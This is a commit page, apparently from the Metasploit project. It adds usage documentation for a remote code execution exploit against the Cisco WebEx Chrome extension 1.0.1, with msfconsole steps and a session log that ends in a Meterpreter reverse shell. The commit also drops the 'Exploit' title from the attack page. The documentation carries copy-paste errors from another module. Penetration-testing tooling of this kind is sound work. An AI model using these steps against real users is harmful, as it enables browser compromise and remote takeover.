Skip to content

Commit 94f9971

Browse files
committed
add module doc and remove the word EXPLOIT from document title
1 parent d87cb4b commit 94f9971

File tree

2 files changed

+55
-1
lines changed

2 files changed

+55
-1
lines changed
Lines changed: 55 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,55 @@
1+
Cisco WebEx is a suite of applications for online meeting organization and video conferencing.
2+
Included in this suite are extensions for popular web browsers which ease use and provide supplemental
3+
features.
4+
5+
Version 1.0.1 of the WebEx extension for Google Chrome contains a vulnerability which allows an
6+
attacker to execute arbitrary commands on a target, which can lead to arbitrary remote code execution.
7+
8+
9+
## Vulnerable Application
10+
11+
Cisco WebEx Chrome Extension 1.0.1 is known to be affected.
12+
13+
## Verification Steps
14+
15+
**Using cisco_webex_ext**
16+
17+
After the encrypted communication is enabled, you are ready to use
18+
hp_dataprotector_encrypted_comms. Here is what you do:
19+
20+
1. Start msfconsole
21+
2. Do: ```use exploit/windows/misc/cisco_webex_ext```
22+
3. Do: ```set SRVHOST [IP ADDRESS]```
23+
4. Do: ```set SRVPORT [PAYLOAD NAME]```
24+
5. Do: ```set URIPATH [ARBITRARY URI]```
25+
6. Do: ```Choose a payload and set any specific options```
26+
6. Do: ```run```, after a target browses to the generated URL, you should receive a session like the following:
27+
28+
```
29+
msf > use exploits/windows/misc/cisco_webex_ext
30+
msf exploit(cisco_webex_ext) > set srvhost 10.6.0.151
31+
srvhost => 10.6.0.151
32+
msf exploit(cisco_webex_ext) > set srvport 4567
33+
srvport => 4567
34+
msf exploit(cisco_webex_ext) > set uripath not_a_very_good_meeting
35+
uripath => not_a_very_good_meeting
36+
msf exploit(cisco_webex_ext) > run
37+
[*] Exploit running as background job.
38+
39+
[*] Started reverse TCP handler on 10.6.255.229:4444
40+
[*] Using URL: https://10.6.0.151:4567/not_a_very_good_meeting
41+
[*] Server started.
42+
msf exploit(cisco_webex_ext) > [*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting
43+
[*] 10.6.0.151 cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
44+
[*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting/cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html
45+
[*] 10.6.0.151 cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
46+
[*] 10.6.0.151 cisco_webex_ext - Sending exploit html ...
47+
[*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting/qt3iFe8N
48+
[*] 10.6.0.151 cisco_webex_ext - From:
49+
[*] 10.6.0.151 cisco_webex_ext - Sending payload ...
50+
[*] Sending stage (957487 bytes) to 10.6.255.229
51+
[*] Meterpreter session 1 opened (10.6.255.229:4444 -> 10.6.255.229:57472) at 2017-01-26 13:27:28 -0600
52+
53+
msf exploit(cisco_webex_ext) >
54+
```
55+

modules/exploits/windows/misc/cisco_webex_ext.rb

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -59,7 +59,6 @@ def exploit_html(cli, req_uri)
5959
html = %Q~
6060
<html>
6161
<head>
62-
<title>Cisco WebEx Exploit</title>
6362
<script>
6463
var msg = {
6564
GpcProductRoot: "WebEx",

0 commit comments

Comments
 (0)